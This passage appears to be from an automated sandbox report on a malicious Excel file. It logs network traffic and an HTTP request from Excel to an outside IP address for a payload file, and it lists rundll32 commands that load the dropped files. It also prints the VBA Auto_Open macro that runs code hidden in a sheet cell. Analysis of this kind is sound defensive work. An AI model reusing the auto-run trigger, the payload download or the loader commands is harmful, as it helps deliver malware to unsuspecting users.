                                                                                                                                                  Apr 6, 2021 14:05:20.851906061 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:05:47.446238041 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:05:47.492486954 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:05:48.248888016 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:05:48.297724962 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:06:02.999030113 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:06:03.056432962 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:06:31.920017004 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:06:31.966434956 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                  Apr 6, 2021 14:06:34.481080055 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                  Apr 6, 2021 14:06:34.527141094 CEST53597948.8.8.8192.168.2.4

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 185.212.131.194

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.449730185.212.131.19480C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Apr 6, 2021 14:04:13.429167032 CEST1220OUTGET /44285,5327891204.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 185.212.131.194
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Apr 6, 2021 14:04:13.671674967 CEST1222INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 06 Apr 2021 12:05:10 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:14:03:46
                                                                                                                                                  Start date:06/04/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x860000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:14:04:34
                                                                                                                                                  Start date:06/04/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:rundll32 ..\Hodas.vyur,PluginInit
                                                                                                                                                  Imagebase:0x820000
                                                                                                                                                  File size:61952 bytes
                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:14:04:34
                                                                                                                                                  Start date:06/04/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:rundll32 ..\Hodas.vyur1,PluginInit
                                                                                                                                                  Imagebase:0x820000
                                                                                                                                                  File size:61952 bytes
                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:14:04:35
                                                                                                                                                  Start date:06/04/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:rundll32 ..\Hodas.vyur2,PluginInit
                                                                                                                                                  Imagebase:0x820000
                                                                                                                                                  File size:61952 bytes
                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Call Graph

                                                                                                                                                  Graph

                                                                                                                                                  • Entrypoint
                                                                                                                                                  • Decryption Function
                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  • Show Help
                                                                                                                                                  callgraph 2 Auto_Open Run:1,Range:1

                                                                                                                                                  Module: Module1

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Module1"

                                                                                                                                                  Executed Functions
                                                                                                                                                  APIsMeta Information

                                                                                                                                                  ScreenUpdating

                                                                                                                                                  Run

                                                                                                                                                  Microsoft Excel:Application.Run()

                                                                                                                                                  Range

                                                                                                                                                  StringsDecrypted Strings
                                                                                                                                                  "CD105"
                                                                                                                                                  "Lops"
                                                                                                                                                  LineInstructionMeta Information
                                                                                                                                                  2

                                                                                                                                                  Private Sub Auto_Open()

                                                                                                                                                  3

                                                                                                                                                  Application.ScreenUpdating = True

                                                                                                                                                  ScreenUpdating

                                                                                                                                                  executed
                                                                                                                                                  4

                                                                                                                                                  Application.Run Sheets("Lops").Range("CD105")

                                                                                                                                                  Microsoft Excel:Application.Run()

                                                                                                                                                  Range

                                                                                                                                                  executed
                                                                                                                                                  5

                                                                                                                                                  End Sub

                                                                                                                                                  Module: \x041b\x0438\x0441\x04421

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "\x041b\x0438\x0441\x04421"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Module: \x041b\x0438\x0441\x04422

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "\x041b\x0438\x0441\x04422"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Module: \x042d\x0442\x0430\x041a\x043d\x0438\x0433\x0430

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "\x042d\x0442\x0430\x041a\x043d\x0438\x0433\x0430"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Reset < >